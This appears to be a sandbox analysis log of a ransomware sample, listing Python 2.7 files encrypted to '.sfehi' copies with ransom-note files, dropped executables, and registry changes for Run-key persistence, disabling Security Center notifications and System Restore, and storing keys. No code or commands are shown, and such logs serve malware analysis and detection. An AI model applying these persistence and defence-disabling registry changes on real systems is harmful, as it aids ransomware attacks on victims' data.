C:\Python27\include\setobject.h.sfehi
C:\Python27\include\sliceobject.h
C:\Python27\include\sliceobject.h.sfehi
C:\Python27\include\stringobject.h
C:\Python27\include\stringobject.h.sfehi
C:\Python27\include\structmember.h
C:\Python27\include\structmember.h.sfehi
C:\Python27\include\structseq.h
C:\Python27\include\structseq.h.sfehi
C:\Python27\include\symtable.h
C:\Python27\include\symtable.h.sfehi
C:\Python27\include\sysmodule.h
C:\Python27\include\sysmodule.h.sfehi
C:\Python27\include\timefuncs.h
C:\Python27\include\timefuncs.h.sfehi
C:\Python27\include\token.h
C:\Python27\include\token.h.sfehi
C:\Python27\include\traceback.h
C:\Python27\include\traceback.h.sfehi
C:\Python27\include\tupleobject.h
C:\Python27\include\tupleobject.h.sfehi
C:\Python27\include\ucnhash.h
C:\Python27\include\ucnhash.h.sfehi
C:\Python27\include\unicodeobject.h
C:\Python27\include\unicodeobject.h.sfehi
C:\Python27\include\warnings.h
C:\Python27\include\warnings.h.sfehi
C:\Python27\include\weakrefobject.h
C:\Python27\include\weakrefobject.h.sfehi
C:\Python27\Lib\SFEHI-DECRYPT.txt
C:\Python27\Lib\a4889873a4889f9232.lock
C:\Python27\Lib\abc.py
C:\Python27\Lib\abc.py.sfehi
C:\Python27\Lib\abc.pyc
C:\Python27\Lib\abc.pyc.sfehi
C:\Python27\Lib\abc.pyo
C:\Python27\Lib\abc.pyo.sfehi
C:\Python27\Lib\aifc.py
C:\Python27\Lib\aifc.py.sfehi
C:\Python27\Lib\antigravity.py
C:\Python27\Lib\antigravity.py.sfehi
C:\Python27\Lib\anydbm.py
C:\Python27\Lib\anydbm.py.sfehi
C:\Python27\Lib\argparse.py
C:\Python27\Lib\argparse.py.sfehi
C:\Python27\Lib\ast.py
C:\Python27\Lib\ast.py.sfehi
C:\Python27\Lib\asynchat.py
C:\Python27\Lib\asynchat.py.sfehi
C:\Python27\Lib\asyncore.py
C:\Python27\Lib\asyncore.py.sfehi
C:\Python27\Lib\atexit.py
C:\Python27\Lib\atexit.py.sfehi
C:\Python27\Lib\atexit.pyc
C:\Python27\Lib\atexit.pyc.sfehi
C:\Python27\Lib\audiodev.py
C:\Python27\Lib\audiodev.py.sfehi
C:\Python27\Lib\base64.py
C:\Python27\Lib\base64.py.sfehi
C:\Python27\Lib\base64.pyc
C:\Python27\Lib\base64.pyc.sfehi
C:\Python27\Lib\BaseHTTPServer.py
C:\Python27\Lib\BaseHTTPServer.py.sfehi
C:\Python27\Lib\BaseHTTPServer.pyc
C:\Python27\Lib\BaseHTTPServer.pyc.sfehi
C:\Python27\Lib\Bastion.py
C:\Python27\Lib\Bastion.py.sfehi
C:\Python27\Lib\bdb.py
C:\Python27\Lib\bdb.py.sfehi
C:\Python27\Lib\bdb.pyc
C:\Python27\Lib\bdb.pyc.sfehi
C:\Python27\Lib\binhex.py
C:\Python27\Lib\binhex.py.sfehi
C:\Python27\Lib\bisect.py
C:\Python27\Lib\bisect.py.sfehi
C:\Python27\Lib\bsddb\SFEHI-DECRYPT.txt
C:\Python27\Lib\bsddb\a4889873a4889f9232.lock
C:\Python27\Lib\bsddb\db.py
C:\Python27\Lib\bsddb\db.py.sfehi
C:\Python27\Lib\bsddb\dbobj.py
C:\Python27\Lib\bsddb\dbobj.py.sfehi
C:\Python27\Lib\bsddb\dbrecio.py
C:\Python27\Lib\bsddb\dbrecio.py.sfehi
C:\Python27\Lib\bsddb\dbshelve.py
C:\Python27\Lib\bsddb\dbshelve.py.sfehi
C:\Python27\Lib\bsddb\dbtables.py
C:\Python27\Lib\bsddb\dbtables.py.sfehi
C:\Python27\Lib\bsddb\dbutils.py
C:\Python27\Lib\bsddb\dbutils.py.sfehi
C:\Python27\Lib\bsddb\test\SFEHI-DECRYPT.txt
C:\Python27\Lib\bsddb\test\a4889873a4889f9232.lock
C:\Python27\Lib\bsddb\test\test_all.py
C:\Python27\Lib\bsddb\test\test_all.py.sfehi
C:\Python27\Lib\bsddb\test\test_associate.py
C:\Python27\Lib\bsddb\test\test_associate.py.sfehi
C:\Python27\Lib\bsddb\test\test_basics.py
C:\Python27\Lib\bsddb\test\test_basics.py.sfehi
C:\Python27\Lib\bsddb\test\test_compare.py
C:\Python27\Lib\bsddb\test\test_compare.py.sfehi
C:\Python27\Lib\bsddb\test\test_compat.py
C:\Python27\Lib\bsddb\test\test_compat.py.sfehi
C:\Python27\Lib\bsddb\test\test_cursor_pget_bug.py
C:\Python27\Lib\bsddb\test\test_cursor_pget_bug.py.sfehi
C:\Python27\Lib\bsddb\test\test_db.py
C:\Python27\Lib\bsddb\test\test_db.py.sfehi
C:\Python27\Lib\bsddb\test\test_dbenv.py
C:\Python27\Lib\bsddb\test\test_dbenv.py.sfehi
C:\Python27\Lib\bsddb\test\test_dbobj.py
C:\Python27\Lib\bsddb\test\test_dbobj.py.sfehi
C:\Python27\Lib\bsddb\test\test_dbshelve.py
C:\Python27\Lib\bsddb\test\test_dbshelve.py.sfehi
C:\Python27\Lib\bsddb\test\test_dbtables.py
C:\Python27\Lib\bsddb\test\test_dbtables.py.sfehi
C:\Python27\Lib\bsddb\test\test_distributed_transactions.py
C:\Python27\Lib\bsddb\test\test_distributed_transactions.py.sfehi
C:\Python27\Lib\bsddb\test\test_early_close.py
C:\Python27\Lib\bsddb\test\test_early_close.py.sfehi
C:\Python27\Lib\bsddb\test\test_fileid.py
C:\Python27\Lib\bsddb\test\test_fileid.py.sfehi
C:\Python27\Lib\bsddb\test\test_get_none.py
C:\Python27\Lib\bsddb\test\test_get_none.py.sfehi
C:\Python27\Lib\bsddb\test\test_join.py
C:\Python27\Lib\bsddb\test\test_join.py.sfehi
C:\Python27\Lib\bsddb\test\test_lock.py
C:\Python27\Lib\bsddb\test\test_lock.py.sfehi
C:\Python27\Lib\bsddb\test\test_misc.py
C:\Python27\Lib\bsddb\test\test_misc.py.sfehi
C:\Python27\Lib\bsddb\test\test_pickle.py
C:\Python27\Lib\bsddb\test\test_pickle.py.sfehi
C:\Python27\Lib\bsddb\test\test_queue.py
C:\Python27\Lib\bsddb\test\test_queue.py.sfehi
C:\Python27\Lib\bsddb\test\test_recno.py
C:\Python27\Lib\bsddb\test\test_recno.py.sfehi
C:\Python27\Lib\bsddb\test\test_replication.py
C:\Python27\Lib\bsddb\test\test_replication.py.sfehi
C:\Python27\Lib\bsddb\test\test_sequence.py
C:\Python27\Lib\bsddb\test\test_sequence.py.sfehi
C:\Python27\Lib\bsddb\test\test_thread.py
C:\Python27\Lib\bsddb\test\test_thread.py.sfehi
C:\Python27\Lib\bsddb\__init__.py
C:\Python27\Lib\bsddb\__init__.py.sfehi
C:\Python27\Lib\calendar.py
C:\Python27\Lib\calendar.py.sfehi
C:\Python27\Lib\calendar.pyc
C:\Python27\Lib\calendar.pyc.sfehi
C:\Python27\Lib\cgi.py
C:\Python27\Lib\cgi.py.sfehi
C:\Python27\Lib\CGIHTTPServer.py
C:\Python27\Lib\CGIHTTPServer.py.sfehi
C:\Python27\Lib\cgitb.py
C:\Python27\Lib\cgitb.py.sfehi
C:\Python27\Lib\chunk.py
C:\Python27\Lib\chunk.py.sfehi
C:\Python27\Lib\cmd.py
C:\Python27\Lib\cmd.py.sfehi
C:\Python27\Lib\code.py
C:\Python27\Lib\code.py.sfehi
C:\Python27\Lib\code.pyc
C:\Python27\Lib\code.pyc.sfehi
C:\Python27\Lib\codecs.py
C:\Python27\Lib\codecs.py.sfehi
C:\Python27\Lib\codecs.pyc
C:\Python27\Lib\codecs.pyc.sfehi
C:\Python27\Lib\codecs.pyo
C:\Python27\Lib\codecs.pyo.sfehi
C:\Python27\Lib\codeop.py
C:\Python27\Lib\codeop.py.sfehi
C:\Python27\Lib\codeop.pyc
C:\Python27\Lib\codeop.pyc.sfehi
C:\Python27\Lib\collections.py
C:\Python27\Lib\collections.py.sfehi
C:\Python27\Lib\collections.pyc
C:\Python27\Lib\collections.pyc.sfehi
C:\Python27\Lib\colorsys.py
C:\Python27\Lib\colorsys.py.sfehi
C:\Python27\Lib\commands.py
C:\Python27\Lib\commands.py.sfehi
C:\Python27\Lib\compileall.py
C:\Python27\Lib\compileall.py.sfehi
C:\Python27\Lib\compiler\SFEHI-DECRYPT.txt
C:\Python27\Lib\compiler\a4889873a4889f9232.lock
C:\Python27\Lib\compiler\ast.py
C:\Python27\Lib\compiler\ast.py.sfehi
C:\Python27\Lib\compiler\consts.py
C:\Python27\Lib\compiler\consts.py.sfehi
C:\Python27\Lib\compiler\future.py
C:\Python27\Lib\compiler\future.py.sfehi
C:\Python27\Lib\compiler\misc.py
C:\Python27\Lib\compiler\misc.py.sfehi
C:\Python27\Lib\compiler\pyassem.py
C:\Python27\Lib\compiler\pyassem.py.sfehi
C:\Python27\Lib\compiler\pycodegen.py
C:\Python27\Lib\compiler\pycodegen.py.sfehi
C:\Python27\Lib\compiler\symbols.py
C:\Python27\Lib\compiler\symbols.py.sfehi
C:\Python27\Lib\compiler\syntax.py
C:\Python27\Lib\compiler\syntax.py.sfehi
C:\Python27\Lib\compiler\transformer.py
C:\Python27\Lib\compiler\transformer.py.sfehi
C:\Python27\Lib\compiler\visitor.py
C:\Python27\Lib\compiler\visitor.py.sfehi
C:\Python27\Lib\compiler\__init__.py
C:\Python27\Lib\compiler\__init__.py.sfehi
C:\Python27\Lib\ConfigParser.py
C:\Python27\Lib\ConfigParser.py.sfehi
C:\Python27\Lib\ConfigParser.pyc
C:\Python27\Lib\ConfigParser.pyc.sfehi
C:\Python27\Lib\contextlib.py
C:\Python27\Lib\contextlib.py.sfehi
C:\Python27\Lib\Cookie.py
C:\Python27\Lib\Cookie.py.sfehi
C:\Python27\Lib\cookielib.py
C:\Python27\Lib\cookielib.py.sfehi
C:\Python27\Lib\copy.py
C:\Python27\Lib\copy.py.sfehi
C:\Python27\Lib\copy.pyc
C:\Python27\Lib\copy.pyc.sfehi
C:\Python27\Lib\copy_reg.py
C:\Python27\Lib\copy_reg.py.sfehi
C:\Python27\Lib\copy_reg.pyc
C:\Python27\Lib\copy_reg.pyc.sfehi
C:\Python27\Lib\copy_reg.pyo
C:\Python27\Lib\copy_reg.pyo.sfehi
C:\Python27\Lib\cProfile.py
C:\Python27\Lib\cProfile.py.sfehi
C:\Python27\Lib\csv.py
C:\Python27\Lib\csv.py.sfehi
C:\Python27\Lib\ctypes\SFEHI-DECRYPT.txt
C:\Python27\Lib\ctypes\a4889873a4889f9232.lock
C:\Python27\Lib\ctypes\macholib\SFEHI-DECRYPT.txt
C:\Python27\Lib\ctypes\macholib\a4889873a4889f9232.lock
C:\Python27\Lib\ctypes\macholib\dyld.py
C:\Python27\Lib\ctypes\macholib\dyld.py.sfehi
C:\Python27\Lib\ctypes\macholib\dylib.py
C:\Users\user\AppData\Local\Temp\4X6zg5pg.exe:Zone.Identifier
C:\Windows\5769805074060605\winsvcs.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2841536727.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3751939260.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1865041414.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2080821079.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1257032286.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1674519319.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3065331339.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3876917383.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2810629864.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3750816931.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1398632723.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\4032832645.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1674315261.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2459023548.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3304035876.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2400240831.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2686919881.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2293722122.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1227434603.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2673932424.exe:Zone.Identifier
C:\Windows\806084767800850\winsvcs.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1495120250.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1717238076.exe:Zone.Identifier
C:\agent.pyw
C:\Python27\DLLs\bz2.pyd
C:\Python27\DLLs\unicodedata.pyd
C:\Python27\DLLs\winsound.pyd
C:\Python27\DLLs\_bsddb.pyd
C:\Python27\DLLs\_ctypes_test.pyd
C:\Python27\DLLs\_elementtree.pyd
C:\Python27\DLLs\_msi.pyd
C:\Python27\DLLs\_multiprocessing.pyd
C:\Python27\DLLs\_sqlite3.pyd
C:\Python27\DLLs\_testcapi.pyd
C:\Python27\Doc\python276.chm
C:\Python27\include\abstract.h
C:\Python27\include\asdl.h
C:\Python27\include\ast.h
C:\Python27\include\bitset.h
C:\Python27\include\boolobject.h
C:\Python27\include\bufferobject.h
C:\Python27\include\bytearrayobject.h
C:\Python27\include\bytesobject.h
C:\Python27\include\bytes_methods.h
C:\Python27\include\cellobject.h
C:\Python27\include\ceval.h
C:\Python27\include\classobject.h
C:\Python27\include\cobject.h
C:\Python27\include\code.h
C:\Python27\include\codecs.h
C:\Python27\include\compile.h
C:\Python27\include\complexobject.h
C:\Python27\include\cStringIO.h
C:\Python27\include\datetime.h
C:\Python27\include\descrobject.h
C:\Python27\include\dictobject.h
C:\Python27\include\dtoa.h
C:\Python27\include\enumobject.h
C:\Python27\include\errcode.h
C:\Python27\include\eval.h
C:\Python27\include\fileobject.h
C:\Python27\include\floatobject.h
C:\Python27\include\frameobject.h
C:\Python27\include\funcobject.h
C:\Python27\include\genobject.h
C:\Python27\include\graminit.h
C:\Python27\include\grammar.h
C:\Python27\include\import.h
C:\Python27\include\intobject.h
C:\Python27\include\intrcheck.h
C:\Python27\include\iterobject.h
C:\Python27\include\listobject.h
C:\Python27\include\longintrepr.h
C:\Python27\include\longobject.h
C:\Python27\include\marshal.h
C:\Python27\include\memoryobject.h
C:\Python27\include\metagrammar.h
C:\Python27\include\methodobject.h
C:\Python27\include\modsupport.h
C:\Python27\include\moduleobject.h
C:\Python27\include\node.h
C:\Python27\include\object.h
C:\Python27\include\objimpl.h
C:\Python27\include\opcode.h
C:\Python27\include\osdefs.h
C:\Python27\include\parsetok.h
C:\Python27\include\patchlevel.h
C:\Python27\include\pgen.h
C:\Python27\include\pgenheaders.h
C:\Python27\include\pyarena.h
C:\Python27\include\pycapsule.h
C:\Python27\include\pyconfig.h
C:\Python27\include\pyctype.h
C:\Python27\include\pydebug.h
C:\Python27\include\pyerrors.h
C:\Python27\include\pyexpat.h
C:\Python27\include\pyfpe.h
C:\Python27\include\pygetopt.h
C:\Python27\include\pymacconfig.h
C:\Python27\include\pymactoolbox.h
C:\Python27\include\pymath.h
C:\Python27\include\pymem.h
C:\Python27\include\pyport.h
C:\Python27\include\pystate.h
C:\Python27\include\pystrcmp.h
C:\Python27\include\pystrtod.h
C:\Python27\include\Python-ast.h
C:\Python27\include\Python.h
C:\Python27\include\pythonrun.h
C:\Python27\include\pythread.h
C:\Python27\include\py_curses.h
C:\Python27\include\rangeobject.h
C:\Python27\include\setobject.h
C:\Python27\include\sliceobject.h
C:\Python27\include\stringobject.h
C:\Python27\include\structmember.h
C:\Python27\include\structseq.h
C:\Python27\include\symtable.h
C:\Python27\include\sysmodule.h
C:\Python27\include\timefuncs.h
C:\Python27\include\token.h
C:\Python27\include\traceback.h
C:\Python27\include\tupleobject.h
C:\Python27\include\ucnhash.h
C:\Python27\include\unicodeobject.h
C:\Python27\include\warnings.h
C:\Python27\include\weakrefobject.h
C:\Python27\Lib\abc.py
C:\Python27\Lib\abc.pyc
C:\Python27\Lib\abc.pyo
C:\Python27\Lib\aifc.py
C:\Python27\Lib\antigravity.py
C:\Python27\Lib\anydbm.py
C:\Python27\Lib\argparse.py
C:\Python27\Lib\ast.py
C:\Python27\Lib\asynchat.py
C:\Python27\Lib\asyncore.py
C:\Python27\Lib\atexit.py
C:\Python27\Lib\atexit.pyc
C:\Python27\Lib\audiodev.py
C:\Python27\Lib\base64.py
C:\Python27\Lib\base64.pyc
C:\Python27\Lib\BaseHTTPServer.py
C:\Python27\Lib\BaseHTTPServer.pyc
C:\Python27\Lib\Bastion.py
C:\Python27\Lib\bdb.py
C:\Python27\Lib\bdb.pyc
C:\Python27\Lib\binhex.py
C:\Python27\Lib\bisect.py
C:\Python27\Lib\bsddb\db.py
C:\Python27\Lib\bsddb\dbobj.py
C:\Python27\Lib\bsddb\dbrecio.py
C:\Python27\Lib\bsddb\dbshelve.py
C:\Python27\Lib\bsddb\dbtables.py
C:\Python27\Lib\bsddb\dbutils.py
C:\Python27\Lib\bsddb\test\test_all.py
C:\Python27\Lib\bsddb\test\test_associate.py
C:\Python27\Lib\bsddb\test\test_basics.py
C:\Python27\Lib\bsddb\test\test_compare.py
C:\Python27\Lib\bsddb\test\test_compat.py
C:\Python27\Lib\bsddb\test\test_cursor_pget_bug.py
C:\Python27\Lib\bsddb\test\test_db.py
C:\Python27\Lib\bsddb\test\test_dbenv.py
C:\Python27\Lib\bsddb\test\test_dbobj.py
C:\Python27\Lib\bsddb\test\test_dbshelve.py
C:\Python27\Lib\bsddb\test\test_dbtables.py
C:\Python27\Lib\bsddb\test\test_distributed_transactions.py
C:\Python27\Lib\bsddb\test\test_early_close.py
C:\Python27\Lib\bsddb\test\test_fileid.py
C:\Python27\Lib\bsddb\test\test_get_none.py
C:\Python27\Lib\bsddb\test\test_join.py
C:\Python27\Lib\bsddb\test\test_lock.py
C:\Python27\Lib\bsddb\test\test_misc.py
C:\Python27\Lib\bsddb\test\test_pickle.py
C:\Python27\Lib\bsddb\test\test_queue.py
C:\Python27\Lib\bsddb\test\test_recno.py
C:\Python27\Lib\bsddb\test\test_replication.py
C:\Python27\Lib\bsddb\test\test_sequence.py
C:\Python27\Lib\bsddb\test\test_thread.py
C:\Python27\Lib\bsddb\__init__.py
C:\Python27\Lib\calendar.py
C:\Python27\Lib\calendar.pyc
C:\Python27\Lib\cgi.py
C:\Python27\Lib\CGIHTTPServer.py
C:\Python27\Lib\cgitb.py
C:\Python27\Lib\chunk.py
C:\Python27\Lib\cmd.py
C:\Python27\Lib\code.py
C:\Python27\Lib\code.pyc
C:\Python27\Lib\codecs.py
C:\Python27\Lib\codecs.pyc
C:\Python27\Lib\codecs.pyo
C:\Python27\Lib\codeop.py
C:\Python27\Lib\codeop.pyc
C:\Python27\Lib\collections.py
C:\Python27\Lib\collections.pyc
C:\Python27\Lib\colorsys.py
C:\Python27\Lib\commands.py
C:\Python27\Lib\compileall.py
C:\Python27\Lib\compiler\ast.py
C:\Python27\Lib\compiler\consts.py
C:\Python27\Lib\compiler\future.py
C:\Python27\Lib\compiler\misc.py
C:\Python27\Lib\compiler\pyassem.py
C:\Python27\Lib\compiler\pycodegen.py
C:\Python27\Lib\compiler\symbols.py
C:\Python27\Lib\compiler\syntax.py
C:\Python27\Lib\compiler\transformer.py
C:\Python27\Lib\compiler\visitor.py
C:\Python27\Lib\compiler\__init__.py
C:\Python27\Lib\ConfigParser.py
C:\Python27\Lib\ConfigParser.pyc
C:\Python27\Lib\contextlib.py
C:\Python27\Lib\Cookie.py
C:\Python27\Lib\cookielib.py
C:\Python27\Lib\copy.py
C:\Python27\Lib\copy.pyc
C:\Python27\Lib\copy_reg.py
C:\Python27\Lib\copy_reg.pyc
C:\Python27\Lib\copy_reg.pyo
C:\Python27\Lib\cProfile.py
C:\Python27\Lib\csv.py
C:\Python27\Lib\ctypes\macholib\dyld.py
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AutoUpdateDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_CURRENT_USER\Keyboard Layout\Preload
HKEY_CURRENT_USER\Keyboard Layout\Preload\1
HKEY_CURRENT_USER\Keyboard Layout\Preload\2
HKEY_CURRENT_USER\Keyboard Layout\Preload\3
HKEY_CURRENT_USER\Keyboard Layout\Preload\4
HKEY_CURRENT_USER\Keyboard Layout\Preload\5
HKEY_CURRENT_USER\Keyboard Layout\Preload\6
HKEY_CURRENT_USER\Keyboard Layout\Preload\7
HKEY_CURRENT_USER\Keyboard Layout\Preload\8
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_CURRENT_USER\Control Panel\International
HKEY_CURRENT_USER\Control Panel\International\LocaleName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\productName
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier
HKEY_LOCAL_MACHINE\SOFTWARE\keys_data\data
HKEY_CURRENT_USER\SOFTWARE\keys_data\data
HKEY_LOCAL_MACHINE\SOFTWARE\ex_data\data
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\ex_data\data\ext
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\keys_data\data\public
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\keys_data\data\private
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Network
HKEY_LOCAL_MACHINE\system\CurrentControlSet
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\control\NetworkProvider\HwOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\NetworkProvider\HwOrder\ProviderOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RDPNP\NetworkProvider
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RDPNP\NetworkProvider\name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RDPNP\NetworkProvider\Class
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RDPNP\NetworkProvider\ProviderPath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\NetworkProvider
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\NetworkProvider\name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\NetworkProvider\Class
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\NetworkProvider\ProviderPath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\NetworkProvider
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\NetworkProvider\name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\NetworkProvider\Class
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\NetworkProvider\ProviderPath
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\NetworkProvider
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\NetworkProvider\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AutoUpdateDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
